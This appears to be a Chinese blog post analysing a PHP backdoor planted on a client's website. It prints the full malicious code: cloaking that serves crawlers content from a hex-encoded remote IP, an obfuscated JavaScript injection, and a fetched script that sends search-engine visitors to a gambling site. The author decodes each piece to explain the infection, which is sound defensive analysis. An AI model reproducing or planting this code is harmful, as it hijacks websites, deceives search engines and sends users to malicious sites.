PHP pack() 函数

今天遇到一个问题，客户使用360浏览器‘极速模式’下打开自家的网站是正常的，但是使用360浏览器‘兼容模式’下跳到的博彩网站，到底是因为什么呢？ 发现网站被挂马了

代码如下：

 <?php

 $key= $_SERVER["HTTP_USER_AGENT"];
 if(strpos($key,'spider')!== false || strpos($key,'bot')!==false || strpos($key,'rident')!==false || strpos($key,'so')!==false || strpos($key,'aidu')!==false || strpos($key,'ogou')!==false)
 {
   header("Content-Type: text/html;charset=gb2312");
   $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
   $file = file_get_contents(pack("H*","687474703a2f2f3130332e3232392e36362e3132343a383033312f")."/index.php?host=".$host_name."&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']); 
   echo $file;
   exit();
 }else{
    echo '<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,52,52,49,55,55,57,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt); </script>';
 }
 
 ?>

咋一看，看不懂这段代码，特别是

//PHP
pack("H*","687474703a2f2f3130332e3232392e36362e3132343a383033312f")
//JavaScript
echo '<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,52,52,49,55,55,57,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt); </script>';

先去查一些资料：

定义和用法

pack() 函数把数据装入一个二进制字符串。 image.png

执行一下,结果如下

[root@VM_0_11_centos phpspider]# php -a
Interactive shell

php > echo pack("H*","687474703a2f2f3130332e3232392e36362e3132343a383033312f");
http://103.229.66.124:8031/
php >

打开网址看下:

image.png

常用搜索引擎名与 HTTP_USER_AGENT对应值

百度baiduspider

谷歌googlebot

搜狗sogou

腾讯SOSOsosospider

雅虎slurp

有道youdaobot

Bingbingbot

MSNmsnbot

Alexais_archiver

爬虫爬到的是http://103.229.66.124:8031/ 的内容，而不是客户网站的内容，难怪投诉百度快照，无法删除或者更新快照

再看看下面这段js代码是什么？

var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,52,52,49,55,55,57,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt);

image.png

我们打开：https://sfhufh2.com/441779.js看下

var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?9266e837c551f81c46e40f8336d58596";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://441779.com\";");
document.writeln("</script>");

从以上代码可以看出只要是从百度、搜狗、搜搜、uc、必应、手机搜索引擎....搜索关键词，找到符合的网站 然后点进去就会跳到https://441779.com\ 去

参考：
PHP pack() 函数
PHP屏蔽蜘蛛访问代码及常用搜索引擎的HTTP_USER_AGENT